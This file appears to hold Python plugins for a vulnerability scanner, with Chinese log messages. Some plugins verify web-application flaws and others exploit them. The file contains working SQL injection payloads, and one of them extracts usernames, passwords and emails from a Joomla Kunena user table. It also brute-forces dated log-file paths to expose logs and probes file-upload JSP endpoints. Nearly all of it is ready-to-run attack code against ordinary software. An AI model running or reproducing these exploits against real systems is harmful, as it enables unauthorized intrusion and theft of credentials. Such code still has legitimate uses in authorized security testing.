def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) start = '2018-01-01' end = '2018-12-31' datestart = datetime.datetime.strptime(start, '%Y-%m-%d') dateend = datetime.datetime.strptime(end, '%Y-%m-%d') while datestart < dateend: datestart += datetime.timedelta(days=1) payload = datestart.strftime('%Y_%m_%d')[2:10] self.output.info('正在生成日志爆破字典') vul_url = arg + '/Data/Log/' + payload + '.log' response = requests.get(vul_url) if response.status_code == 200 and 'INFO:' in response.text: self.output.info('字典爆破成功') self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) break except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # Refer http://www.wooyun.org/bugs/wooyun-2015-0108559 payloads = [ '/mana/edit/uploadattcah.jsp', '/mana/edit/attach_upload.jsp', '/mana/edit/uploadimg.jsp', '/mana/edit/uploadmult.jsp', '/mana/edit/uploadflash.jsp' ] for payload in payloads: #code, head, res, errcode, _ = curl.curl2(arg+payload) r = requests.get(self.target + payload) if r.status_code == 200 and ('_upload.jsp' in r.text or 'uploadnexturl' in r.text): #security_hole('Arbitrary file upload vulnerability '+ arg + payload) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) # 访问的地址 exploit = '/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=' # 利用union的方式(计算md5(3.1415)) payload = "-1/**/aNd/**/1=0/**/uNioN++sElecT+1,md5(3.1415)--" # 构造漏洞利用连接 vulurl = arg + exploit + payload # 自定义的HTTP头 httphead = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Connection': 'keep-alive' } # 发送请求 resp = requests.get(vulurl, headers=httphead, timeout=50) # 检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488) if '63e1f04640e83605c1d177544a5a0488' in resp.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) target = arg + "/index.php?m=member&f=register_save" data = { "username": "******", "password": "******", "password2": "123456", "fields[truename]": "", "fileds[email]": "", "submit": " ? ? " } payload = urllib.parse.urlencode(data) req = requests.get(target + "?" + payload) if req.status_code == 200 and "ac59075b964b0715" in req.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def exploit(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 漏洞利用'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) # 访问的地址 exploit = '/index.php?option=com_kunena&func=userlist&search=' # 利用Union方式读取信息 payload = "%' and 1=2) union select 1, 1,concat(0x247e7e7e24,username,"\ "0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),1,1,1,1,1,1,1,0,0,0,1,1 from jos_users limit 0,1-- ;" # 构造漏洞利用连接 vulurl = arg+exploit+payload # 自定义的HTTP头 httphead = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Connection': 'keep-alive' } # 提取信息的正则表达式 parttern = '\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$' # 发送请求 resp = requests.get(url=vulurl, headers=httphead, timeout=50) # 检查是否含有特征字符串 if '$~~~$' in resp.text: # 提取信息 match = re.search(parttern, resp.text, re.M | re.I) if match: username = match.group(1) password = match.group(2) self.output.report(self.vuln, '发现{target}存在{name}漏洞,获取到的用户名为{username} 密码为{password}'.format( target=self.target, name=self.vuln.name, username=username, password=password)) except Exception as e: self.output.info('执行异常{}'.format(e))
def exploit(self): try: self.output.info('开始对 {target} 进行 {vuln} 漏洞利用'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) payload = "/manager/admin_ajax.php?action=save&tab={pre}thirdpart_config" start = '2018-01-01' end = '2018-12-31' datestart = datetime.datetime.strptime(start, '%Y-%m-%d') dateend = datetime.datetime.strptime(end, '%Y-%m-%d') while datestart < dateend: datestart += datetime.timedelta(days=1) payload = datestart.strftime('%Y-%m-%d') vul_url = arg + '/log/operate_' + payload + '.log' respose = requests.get(vul_url) if respose.status_code == 200 and 'loginame' in respose.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞,获取的漏洞url地址为{url}'.format( target=self.target, name=self.vuln.name, url=vul_url)) break except Exception as e: self.output.info('执行异常{}'.format(e))